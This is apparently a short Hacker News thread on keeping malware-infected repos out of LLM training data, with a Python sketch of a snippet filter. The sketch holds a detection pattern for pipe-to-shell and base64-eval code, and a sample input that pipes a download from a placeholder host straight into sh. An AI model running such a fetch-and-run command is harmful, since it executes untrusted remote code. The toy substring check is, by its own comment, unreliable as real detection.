zitterbewegung 10 months ago | on: Over 100k Infected Repos Found on GitHub

Datasets will probably move toward curated collections instead of scraping everything from the Internet. You could also add a tool whose purpose is to identify malware and reject the output, for example by using VirusTotal.

thriftwy 10 months ago

Why not just ask an LLM whether it thinks the snippet is kooky before adding it to the LLM training set?

You don't need tools in the age of AI, just add an AI pipeline step.
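
For what it's worth, both suggestions in this thread (a malware scanner and an LLM check) fit the same shape: a filter step that drops a snippet if any checker flags it. Here is a rough sketch of that idea. Everything in it is an assumption for illustration: `filter_snippets`, `Checker`, and `toy_signature_check` are made-up names, and the toy check is a stand-in, not a real scanner. A VirusTotal lookup or an LLM call would be wrapped as another function with the same signature.

```python
from typing import Callable, Iterable, Iterator

# Hypothetical checker type: returns True when a snippet looks malicious.
# A real scanner lookup or an LLM judgment would be wrapped to match this.
Checker = Callable[[str], bool]


def filter_snippets(snippets: Iterable[str],
                    checkers: Iterable[Checker]) -> Iterator[str]:
    """Yield only the snippets that no checker flags."""
    checker_list = list(checkers)  # allow several passes over the checkers
    for snippet in snippets:
        if not any(check(snippet) for check in checker_list):
            yield snippet


def toy_signature_check(snippet: str) -> bool:
    """Placeholder check: naive substring matching, for illustration only."""
    suspicious_markers = ("| sh", "eval(base64")
    return any(marker in snippet for marker in suspicious_markers)


candidates = [
    "print('hello')",
    "curl http://example.invalid/install | sh",
]
clean = list(filter_snippets(candidates, [toy_signature_check]))
```

With the toy check, only the first candidate survives. Keeping the checkers pluggable means the scanner and the LLM step can run side by side rather than one replacing the other.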
